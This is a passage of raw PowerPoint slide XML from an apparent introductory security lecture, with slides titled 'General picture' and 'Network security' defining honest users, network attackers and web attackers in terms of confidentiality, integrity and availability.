              <a:defRPr/>
            </a:pPr>
            <a:fld id="{DFD4EE2E-1357-445F-99DA-C044A02CEA19}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D8A753C-0C4E-64CF-6828-7A91C0A3013D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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354328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029200" y="1100138"/>
            <a:ext cx="2209800" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="90000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12291" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="1104900"/>
            <a:ext cx="533400" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699FF"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="12292" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7239000" y="1104900"/>
            <a:ext cx="533400" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="12293" name="Picture 4" descr="http://indarktrees.com/pics/villian%2520copy.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="14191" t="2339" r="11314" b="20322"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8763000" y="1028700"/>
            <a:ext cx="1703388"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8" descr="Alice _8885 by Disney-Grandpa."/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="7903" t="10526" r="9120" b="7895"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="1028700"/>
            <a:ext cx="160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TextBox 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9118601" y="3409950"/>
            <a:ext cx="1116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nb-NO"/>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12296" name="TextBox 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="3409950"/>
            <a:ext cx="71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nb-NO"/>
              <a:t>Alice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12297" name="Right Arrow 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3657600" y="1485900"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699FF"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="12298" name="Right Arrow 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3657600" y="2400300"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699FF"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="12299" name="Right Arrow 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7924800" y="1485900"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="12300" name="Right Arrow 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="7924800" y="2400300"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="12301" name="Title 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="304800"/>
            <a:ext cx="7772400" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO"/>
              <a:t>General picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12302" name="Content Placeholder 14" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="3962400"/>
            <a:ext cx="8686800" cy="2590800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO"/>
              <a:t>Security is about</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO"/>
              <a:t>Honest user (e.g., Alice, Bob, …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO"/>
              <a:t>Dishonest Attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO"/>
              <a:t>How the Attacker </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO"/>
              <a:t>Disrupts honest user’s use of the system  (Integrity, Availability)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO"/>
              <a:t>Learns information intended for Alice only (Confidentiality)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA34FB84-D558-E1CC-E555-49A22C50D39D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{8E96BE0A-1305-4D88-8FF3-828E94FD95AA}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6AA5492-45C8-7CDC-0C04-504BC0517F74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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300648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419600" y="1976438"/>
            <a:ext cx="3276600" cy="3910012"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="90000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="3981450"/>
            <a:ext cx="533400" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699FF"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7162800" y="1976438"/>
            <a:ext cx="533400" cy="2157412"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="13317" name="Picture 4" descr="http://indarktrees.com/pics/villian%2520copy.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="14191" t="2339" r="11314" b="20322"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8686800" y="1905000"/>
            <a:ext cx="1703388"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8" descr="Alice _8885 by Disney-Grandpa."/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="7903" t="10526" r="9120" b="7895"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="3886200"/>
            <a:ext cx="160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extBox 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8451850" y="4286250"/>
            <a:ext cx="213995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nb-NO"/>
              <a:t>Network Attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="nb-NO"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO"/>
              <a:t>Intercepts and controls network communication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13320" name="TextBox 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="6267450"/>
            <a:ext cx="71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nb-NO"/>
              <a:t>Alice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13321" name="Right Arrow 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581400" y="4343400"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699FF"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="13322" name="Right Arrow 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3581400" y="5257800"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699FF"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="13323" name="Right Arrow 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7848600" y="2362200"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="13324" name="Right Arrow 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="7848600" y="3276600"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="13325" name="Picture 11" descr="CompaqAlphaServerES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2255838"/>
            <a:ext cx="1155700" cy="142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6" name="TextBox 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6478588" y="4743450"/>
            <a:ext cx="1001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nb-NO"/>
              <a:t>System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13327" name="Straight Connector 33"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="5956300" y="2967038"/>
            <a:ext cx="488950" cy="303212"/>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3328" name="Straight Connector 35"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="5766594" y="3899694"/>
            <a:ext cx="1028700" cy="1001712"/>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22" name="Cloud Callout 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324600" y="2778125"/>
            <a:ext cx="1155700" cy="1276350"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -200975"/>
              <a:gd name="adj2" fmla="val 175085"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13330" name="Picture 18" descr="toshiba_satellite_a105_s4284_lapto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4252914"/>
            <a:ext cx="1436688"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5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="304800"/>
            <a:ext cx="7772400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Network security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2622C314-75B0-9616-5E01-22D459BED6A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0261B660-C660-4621-AFB6-682FDE3C336D}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05CA5EE4-9CA2-7CC6-BEDF-89585E807341}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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696296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419600" y="1976438"/>
            <a:ext cx="3276600" cy="3910012"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="90000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="3981450"/>
            <a:ext cx="533400" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699FF"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7162800" y="1981200"/>
            <a:ext cx="533400" cy="2000250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="14341" name="Picture 4" descr="http://indarktrees.com/pics/villian%2520copy.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="14191" t="2339" r="11314" b="20322"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8686800" y="1905000"/>
            <a:ext cx="1703388"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8" descr="Alice _8885 by Disney-Grandpa."/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="7903" t="10526" r="9120" b="7895"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="3886200"/>
            <a:ext cx="160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TextBox 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8229601" y="4286250"/>
            <a:ext cx="227647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lgn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO"/>
              <a:t>Web Attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="nb-NO"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO"/>
              <a:t>Sets up malicious site visited by victim; no control of network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14344" name="TextBox 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="6267450"/>
            <a:ext cx="71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nb-NO"/>
              <a:t>Alice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14345" name="Right Arrow 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581400" y="4343400"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699FF"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="14346" name="Right Arrow 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
